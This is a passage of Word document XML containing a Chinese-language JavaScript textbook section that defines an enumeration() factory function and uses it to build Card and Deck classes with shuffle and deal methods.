        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中定义枚举类型的数据。需要注意的是，这里用到了例</w:t>
      </w:r>
      <w:r>
        <w:t>6-1</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>inherit()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-7</w:t>
      </w:r>
      <w:r>
        <w:t>包含一个单独函数</w:t>
      </w:r>
      <w:r>
        <w:t>enumeration()</w:t>
      </w:r>
      <w:r>
        <w:t>。但它不是构造函数，它并没有定义一个名叫</w:t>
      </w:r>
      <w:r>
        <w:t>"enumeration"</w:t>
      </w:r>
      <w:r>
        <w:t>的类。相反，它是一个工厂方法，每次调用它都会创建并返回一个新的类，比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个值创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>Coin</w:t>
      </w:r>
      <w:r>
        <w:t>类：</w:t>
      </w:r>
      <w:r>
        <w:t>Coin.Penny,Coin.Nickel</w:t>
      </w:r>
      <w:r>
        <w:t>等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var Coin=enumeration({Penny:1,Nickel:5,Dime:10,Quarter:25});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var c=Coin.Dime;//</w:t>
      </w:r>
      <w:r>
        <w:t>这是新类的实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c instanceof Coin//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>正常工作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.constructor==Coin//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的属性正常工作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Coin.Quarter+3*Coin.Nickel//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>40:</w:t>
      </w:r>
      <w:r>
        <w:t>将值转换为数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Coin.D</w:t>
      </w:r>
      <w:r>
        <w:t>ime==10//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>更多转换为数字的例子</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Coin.Dime</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Coin.Nickel//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>关系运算符正常工作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>String(Coin.Dime)+":"+Coin.Dime//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"Dime:10":</w:t>
      </w:r>
      <w:r>
        <w:t>强制转换为字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个例子清楚地展示了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>类的灵活性，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的类要比</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>语言中的静态类要更加灵活。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-7</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的枚举类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数创建一个新的枚举类型，实参对象表示类的每个实例的名字和值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回值是一个构造函数，它</w:t>
      </w:r>
      <w:r>
        <w:t>标识这个新类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意，这个构造函数也会抛出异常：不能使用它来创建该类型的新实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回的构造函数包含名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对的映射表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>包括由值组成的数组，以及一个</w:t>
      </w:r>
      <w:r>
        <w:t>foreach()</w:t>
      </w:r>
      <w:r>
        <w:t>迭代器函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function enumeration(namesToValues){//</w:t>
      </w:r>
      <w:r>
        <w:t>这个虚拟的构造函数是返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var enumeration=function(){throw"Can't Instantiate Enumerations";};//</w:t>
      </w:r>
      <w:r>
        <w:t>枚举值继承自这个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var proto=enumeration.prototype=</w:t>
      </w:r>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>constructor:enumeration,//</w:t>
      </w:r>
      <w:r>
        <w:t>标识类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toString:function(){return this.name;},//</w:t>
      </w:r>
      <w:r>
        <w:t>返回名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>valueOf:function(){return this.value;},//</w:t>
      </w:r>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toJSON:function(){return this.name;}//</w:t>
      </w:r>
      <w:r>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enumeration.values=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>用以存放枚举对象的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>现在创建新类型的实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(name in namesToValues){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历每个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var e=inherit(proto);//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个代表它的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.name=name;//</w:t>
      </w:r>
      <w:r>
        <w:t>给它一个名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.value=namesToValues[name];//</w:t>
      </w:r>
      <w:r>
        <w:t>给它一个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enumeration[name]=e;//</w:t>
      </w:r>
      <w:r>
        <w:t>将它设置为构造函数的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enumeration.values.push(e);//</w:t>
      </w:r>
      <w:r>
        <w:t>将它存储到值数组中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一个类方法，用来对类的实例进行迭代</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enumeration.foreach=function(f,c){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">for(var </w:t>
      </w:r>
      <w:r>
        <w:t>i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>this.values.length;i++)f.call(c,this.values[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>返回标识这个新类型的构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return enumeration;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如果用这个枚举类型来实现一个</w:t>
      </w:r>
      <w:r>
        <w:t>"hello world"</w:t>
      </w:r>
      <w:r>
        <w:t>小程序的话，就可以使用枚举类型来表示一副扑克牌。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-8</w:t>
      </w:r>
      <w:r>
        <w:t>中使用</w:t>
      </w:r>
      <w:r>
        <w:t>enumeration()</w:t>
      </w:r>
      <w:r>
        <w:t>函数实现了这个表示一副扑克牌的类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-8</w:t>
      </w:r>
      <w:r>
        <w:t>：使用枚举类型来表示一副扑克牌</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个表示</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>玩牌</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>的类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function Card(suit,rank){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.</w:t>
      </w:r>
      <w:r>
        <w:t>suit=suit;//</w:t>
      </w:r>
      <w:r>
        <w:t>每张牌都有花色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.rank=rank;//</w:t>
      </w:r>
      <w:r>
        <w:t>以及点数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用枚举类型定义花色和点数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Card.Suit=enumeration({Clubs:1,Diamonds:2,Hearts:3,Spades:4});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Card.Rank=enumeration({Two:2,Three:3,Four:4,Five:5,Six:6,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Seven:7,Eight:8,Nine:9,Ten:10,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Jack:11,Queen:12,King:13,Ace:14});//</w:t>
      </w:r>
      <w:r>
        <w:t>定义用以描述牌面</w:t>
      </w:r>
      <w:r>
        <w:t>的文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Card.prototype.toString=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this.rank.toString()+"of"+this.suit.toString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>比较扑克牌中两张牌的大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Card.prototype.compareTo=function(that){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this.rank</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>that.rank)return-1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this.rank</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>that.rank)return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>以扑克牌的玩法规则对牌进行排序的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Card.orderByRank=function(a,b){return a.compareTo(b);};//</w:t>
      </w:r>
      <w:r>
        <w:t>以桥牌的玩法规则对扑牌进行排序的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Card.orderBySuit=function(a,b){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a.suit</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>b.suit)return-1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a.suit</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>b.suit)return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(a.rank</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>b.rank)return-1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a.rank</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>b.rank)return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>定义用以表示一副标准扑克牌的类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function D</w:t>
      </w:r>
      <w:r>
        <w:t>eck(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var cards=this.cards=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>一副牌就是由牌组成的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Card.Suit.foreach(function(s){//</w:t>
      </w:r>
      <w:r>
        <w:t>初始化这个数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Card.Rank.foreach(function(r){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>cards.push(new Card(s,r));</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洗牌的方法</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>重新洗牌并返回洗好的牌</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Deck.prototype.shuffle=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历数组中的每个元素，随机找出牌面最小的元素，并与之（当前遍历的元素）交换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var deck</w:t>
      </w:r>
      <w:r>
        <w:t>=this.cards,len=deck.length;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=len-1;i</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0;i--){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var r=Math.floor(Math.random()*(i+1)),temp;//</w:t>
      </w:r>
      <w:r>
        <w:t>随机数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>temp=deck[i],deck[i]=deck[r],deck[r]=temp;//</w:t>
      </w:r>
      <w:r>
        <w:t>交换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>发牌的方法</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>返回牌的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Deck.prototype.deal=function(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this.cards.length</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">n)throw"Out of </w:t>
      </w:r>
      <w:r>
        <w:t>cards";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this.cards.splice(this.cards.length-n,n);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一副新扑克牌，洗牌并发牌</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var deck=(new Deck()).shuffle();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var hand=deck.deal(13).sort(Card.orderBySuit);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
